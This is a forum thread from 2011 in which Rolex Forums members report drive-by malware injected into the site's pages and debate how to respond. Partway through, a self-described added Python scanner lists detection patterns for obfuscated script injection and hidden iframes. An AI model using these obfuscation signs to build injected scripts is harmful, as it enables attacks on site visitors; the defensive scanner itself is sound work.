The Rolex Forums   The Rolex Watch

Old 10 December 2011, 11:37 AM   #121
gregmoeck
"TRF" Member
 
Join Date: Mar 2010
Location: Maui
Watch: Patek
Posts: 2,032
Sorry if I came off harsh, I know it's tough to fix these server-side issues, hang in there.
Old 10 December 2011, 11:41 AM   #122
Mickey®
Banned
 
Join Date: Aug 2011
Real Name: Mickey®
Location: Atlanta, GA
Watch: Swiss Made
Posts: 5,801
Quote:
Originally Posted by gregmoeck View Post
Damn Microsoft, I use Linux downstairs and never have a problem. I come upstairs and use my Windows netbook and now it's infected. Microsoft Security Essentials just cleaned exploit:JS/Blacloe.AC which I got from this forum. You should shut down the forum until the issue is fixed to prevent others from getting their home PCs compromised. Leaving this up all day probably infected a ton of workstations across the globe.
I'm on a Google Chrome Operating system Laptop...So it isn't Microsoft exactly...
Old 10 December 2011, 11:44 AM   #123
dsio
"TRF" Member
 
Join Date: Jun 2010
Real Name: Ashley
Location: Brisbane
Watch: Rolex Sub 1680 '79
Posts: 2,301
Quote:
Originally Posted by gregmoeck View Post
Damn Microsoft, I use Linux downstairs and never have a problem. I come upstairs and use my Windows netbook and now it's infected. Microsoft Security Essentials just cleaned exploit:JS/Blacloe.AC which I got from this forum. You should shut down the forum until the issue is fixed to prevent others from getting their home PCs compromised. Leaving this up all day probably infected a ton of workstations across the globe.
This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of JavaScript code attempting to pull down a malware payload on every page load on TRF.

You need to kill Apache and point nginx to a holding page until this is over; every minute you try to keep the site up in its present state is doing damage to TRF users.
__________________
-- Omega Seamaster Grand-Lux Stepped Pie-Pan 14K Gold OJ2627 '53 --
-- Omega Cal 320 Chronograph 18K Gold OT2872 '58 --
-- Omega Cal 321 Speedmaster Pro 145.012 '67 --
-- Rolex Submariner 1680 "Ghost" '79 --
-- Rolex SS Daytona 116520 '04 --
Old 10 December 2011, 11:47 AM   #124
77T
2024 SubLV41 Pledge Member
 
Join Date: Dec 2010
Real Name: PaulG
Location: Georgia
Posts: 42,012
BTW a new exploit has surfaced to attack iPads running Safari. It just causes an overflow since the Java Trojan won't download to an iPad.

Just sharing in the spirit of teamwork.

iPads and iPhones running Tapatalk seem to still be fine. Have been using both with no problems

But I tried the iPad with Safari just to check. It ran for several minutes before picking up the probe and then it would just close Safari as the redirect tried to load the jar files.


Sent from my iPad using Tapatalk
__________________


Does anyone really know what time it is?
Old 10 December 2011, 11:49 AM   #125
LordNinja
"TRF" Member
 
Join Date: Aug 2008
Real Name: Chris
Location: Boston
Watch: 116610,116233,OsQz
Posts: 1,109
I thought so. Hmmm

Quote:
Originally Posted by gregmoeck View Post
SQL database injection or some infection, passwords may be compromised, here is what I get now.



Old 10 December 2011, 11:51 AM   #126
LordNinja
"TRF" Member
 
Join Date: Aug 2008
Real Name: Chris
Location: Boston
Watch: 116610,116233,OsQz
Posts: 1,109
Quote:
Originally Posted by dsio View Post
This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of JavaScript code attempting to pull down a malware payload on every page load on TRF.

You need to kill Apache and point nginx to a holding page until this is over; every minute you try to keep the site up in its present state is doing damage to TRF users.
Sadly true.
Old 10 December 2011, 11:53 AM   #127
LordNinja
"TRF" Member
 
Join Date: Aug 2008
Real Name: Chris
Location: Boston
Watch: 116610,116233,OsQz
Posts: 1,109
Sounds like we have a lot of other experienced IT/networking people finally chiming in.
Old 10 December 2011, 11:56 AM   #128
LordNinja
"TRF" Member
 
Join Date: Aug 2008
Real Name: Chris
Location: Boston
Watch: 116610,116233,OsQz
Posts: 1,109
I am prob not the only one that felt I would enrage an admin/mod with my concern. Glad this is such an open place.:)

It pains me to see the forum have any issues at all but it happens.
Old 10 December 2011, 12:01 PM   #129
Rockrolex
TRF Moderator & 2024 SubLV41 Patron
 
Join Date: May 2005
Real Name: God
Location: Washington, D.C.
Watch: What do you think?
Posts: 37,966
Quote:
Originally Posted by Cru Jones View Post
my message:

"Symantec Endpoint Protection - [SID: 24225] - Web Attack: Blackhole Toolkit Website 5 detected."
I've been getting the same message for the past couple of days. Norton 360 has been blocking the attacks.
__________________
Despite the high cost of living, it's still very popular.

Tosser Cabinet Member

Official Member: 'Perpetual 30' Vegas International GTG 2016
Official Member "WIS-CON" Las Vegas International GTG 2017
Official Member "WIS-CON" Las Vegas International GTG 2018
Official Member "WIS-CON" Las Vegas International GTG 2019
Old 10 December 2011, 12:06 PM   #130
sleddog
TRF Moderator & 2024 SubLV41 Patron
 
Join Date: Jul 2007
Real Name: Rob
Location: Nearby.
Posts: 24,931
Quote:
Originally Posted by dsio View Post
This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of JavaScript code attempting to pull down a malware payload on every page load on TRF.

You need to kill Apache and point nginx to a holding page until this is over; every minute you try to keep the site up in its present state is doing damage to TRF users.
Thanks for the point of view Ashley.
What I can suggest ATM is to up your firewall and/or log out from the forum until this issue is resolved.
Personal commitments and an ongoing search for the source are persistent
Quote:
Originally Posted by LordNinja View Post
I am prob not the only one that felt I would enrage an admin/mod with my concern. Glad this is such an open place.:)

It pains me to see the forum have any issues at all but it happens.
The current position is, if you are having Malicious attacks, position your firewall appropriately....
This will be resolved in due time, rest assured!
__________________
He who wears a Rolex is always on time, even when late!!

TRF's "After Dark" Bar & Nightclub Patron-Founding Member..
Old 10 December 2011, 12:25 PM   #131
Grissom
"TRF" Member
 
Join Date: Oct 2010
Real Name: Nathan
Location: US, Latin America
Watch: GMT IIc 18K/SS
Posts: 3,349
I have been browsing with safari via my iPhone with no apparent issues so far.

While I hate to be without TRF for even a few minutes I also would be supportive of TRF being taken offline in order to clean things up so that those with less sophisticated or secure systems would not be unwittingly infected.

Many thanks to Steve, et al, for working towards a speedy resolution
__________________
(Member NAWCC since 1976)
116713LN GMT-IIc 18k/SS (Z) + 116520 SS Daytona (M) + 16700 GMT Master (A) + 16610LV Submariner (V) + 16600 Sea Dweller (Z) +
116400 Milgauss White Dial (V) + 70330N Tudor Heritage Chronograph Grey w/Black Sub Dials (J) + 5513 Submariner Serif Dial (5.2 Mil)

Who else needs an Intervention?
(109 297) (137 237) (73 115) (221) (23) (56) (229) P-Club Member #5

RIP JJ Irani - TRF Legend
Old 10 December 2011, 12:35 PM   #132
Rockrolex
TRF Moderator & 2024 SubLV41 Patron
 
Join Date: May 2005
Real Name: God
Location: Washington, D.C.
Watch: What do you think?
Posts: 37,966
I use IE with Verizon Yahoo as my browser on XP machines. I have no problem accessing TRF. The only issue I've had in the past two days was noted in post #129 above.

When I browse for Rolex Forum in Yahoo, TRF comes up immediately with no issues.

However, when I did a similar search using Google, I got the following message:

Quote:
Warning - visiting this web site may harm your computer!



Suggestions: Or you can continue to http://www.rolexforums.com/ at your own risk. For detailed information about the problems we found, visit Google's Safe Browsing diagnostic page for this site.

For more information about how to protect yourself from harmful software online, you can visit StopBadware.org.

If you are the owner of this web site, you can request a review of your site using Google's Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Advisory provided by


This may be a Google problem more than a TRF problem.
Old 10 December 2011, 12:52 PM   #133
Freelance
"TRF" Member
 
Join Date: Sep 2009
Location: USA
Watch: 1675
Posts: 171
Quote:
Originally Posted by sleddog View Post
Thanks for the point of view Ashley.
What I can suggest ATM is to up your firewall and/or log out from the forum until this issue is resolved.
Personal commitments and an ongoing search for the source are persistent


The current position is, if you are having Malicious attacks, position your firewall appropriately....
This will be resolved in due time, rest assured!
Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.
Old 10 December 2011, 01:01 PM   #134
dsio
"TRF" Member
 
Join Date: Jun 2010
Real Name: Ashley
Location: Brisbane
Watch: Rolex Sub 1680 '79
Posts: 2,301
Quote:
Originally Posted by Freelance View Post
Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.
If you go to view source you can see exactly where it's being loaded. Check on any page and do a find for "d.write"; it's where a heap of banners for watch top 100 lists used to be at the bottom of every page.
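
The manual check described in the post above (view source, search for "d.write"), written as a small offline scanner for saved page HTML. It also flags hidden iframes and character-code obfuscation, which other posts in this thread mention. This is an added example, not part of the original thread or the forum's own code; the rule names, the `scan` function and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Heuristic rules (assumptions for this example): a short alias calling
# .write, eval over a decoded string, and long runs of character codes.
SCRIPT_RULES = {
    "short-alias write": re.compile(r"\b(?!document\b)\w{1,2}\.write\s*\("),
    "eval of decoded string": re.compile(
        r"\beval\s*\([\s\S]*?(?:fromCharCode|unescape|atob)"),
    "long char-code run": re.compile(r"(?:\d{1,3}\s*,\s*){40,}"),
}

class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []        # (line number, rule name)
        self._in_script = False
        self._buf = []            # text of the inline script being read
        self._start = 0           # line where that script tag opened

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script, self._buf = True, []
            self._start = self.getpos()[0]
        elif tag == "iframe":
            # Zero/one-pixel or CSS-hidden frames are invisible to the reader.
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.findings.append((self.getpos()[0], "hidden iframe"))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf)
            for name, rx in SCRIPT_RULES.items():
                if rx.search(body):
                    self.findings.append((self._start, name))
            self._in_script = False

def scan(html):
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return sorted(scanner.findings)

# Constructed sample page (not the code that was injected into the forum).
SAMPLE = """<html><body>
<p>Forum post text</p>
<script>document.write('<b>footer</b>');</script>
<iframe src="http://placeholder.invalid/x" width="1" height="1"></iframe>
<script>var d=document;d.write(unescape('%3Cdiv%3E'));</script>
<script>eval(String.fromCharCode(""" + ",".join(["97"] * 50) + """));</script>
</body></html>"""
```

Calling `scan(SAMPLE)` returns the line and rule for each suspicious element; an ordinary `document.write` call on line 3 is not flagged, so hits are leads for manual review of the template or plugin that emitted them.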
Old 10 December 2011, 01:11 PM   #135
sleddog
TRF Moderator & 2024 SubLV41 Patron
 
Join Date: Jul 2007
Real Name: Rob
Location: Nearby.
Posts: 24,931
Quote:
Originally Posted by Freelance View Post
Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.
This is not taken in "the wrong way".
My advice to you and anyone else receiving the warnings, is "to log out"!!!!

TRF is not holding you hostage to log in, nor is it doing nothing!!

All I'm asking is to keep the antagonism to yourself until the fix has been resolved!
There's more to it than you can see or fathom.

My post was an alternative, not a directive!!
Old 10 December 2011, 04:02 PM   #136
Lol-x
Facilitator
 
Join Date: Nov 2005
Real Name: Steve
Location: Omnipresent
Posts: 33,587
Please be patient guys we are working on getting this resolved asap.

I hope the solution will be obtained shortly.

Please accept my apologies.

I do not have any evidence of compromised accounts or computers at this stage, it may be a false positive, but it is best to err on the side of caution.
__________________

Most folks are about as happy as they make up their minds to be. ~Abraham Lincoln
Nothing compares to the simple pleasure of a bike ride. ~John F. Kennedy

ROLEXploitation - yeah I'm a victim
Old 10 December 2011, 06:27 PM   #137
2careless
"TRF" Member
 
Join Date: Dec 2007
Location: Melbourne, AU
Watch: Pepsi
Posts: 4,370
Until there is a fix to the problem, it seems to me that disabling scripting will disable the access of the malware.

In IE, this can be done by changing the security level of the browser:
1. Go to "Tools" -> "Internet Options", and select the "Security" tab.
2. Select "Internet zone", tick "Enable Protected Mode", select "Custom Level".
3. Scroll down the Settings to the "Scripting" section.
4. Right under "Scripting", there is "Active scripting"; either check Disable or Prompt. Then click "OK" and "OK" to get out.
By choosing "Disable", some websites may break. You can choose "Prompt" and make sure you say "no" in TRF.

In Firefox, it's easier:
1. Go to "Tools" -> "Options".
2. Go to the "Content" tab at the top.
3. Uncheck "Enable Javascript".

Hope this helps.

P.S. If you google "Disable Javascript in IE", there are several answers that contain malware themselves. Be careful!
Old 11 December 2011, 12:40 PM   #138
Lol-x
Facilitator
 
Join Date: Nov 2005
Real Name: Steve
Location: Omnipresent
Posts: 33,587
The problem has been resolved.
It was related to a Tapatalk script.
Tapatalk has not been reinstalled at this stage.

The Google warning takes a day to remove, but everything is running properly as of now.
Old 11 December 2011, 12:46 PM   #139
STEELINOX
2024 SubLV41 Pledge Member
 
Join Date: Oct 2008
Real Name: Sink-O!
Location: a praire in AZ
Watch: ROLEX-less atm...
Posts: 14,021
Quote:
Originally Posted by Lol-x View Post
The problem has been resolved.
It was related to a Tapatalk script.
Tapatalk has not been reinstalled at this stage.

The google warning takes a day to remove, but everything is running properly as of now.
Great news StevO !
__________________

*Positive Waves Baby*
Lug Hole Loyalist / Chamfer Line Inspector
INFORTHE WIN
SUB-MAH-REEEN-ER ~ !
Copyright ©2004-2024, The Rolex Forums. All Rights Reserved.


Rolex is a registered trademark of ROLEX USA. The Rolex Forums is not affiliated with ROLEX USA in any way.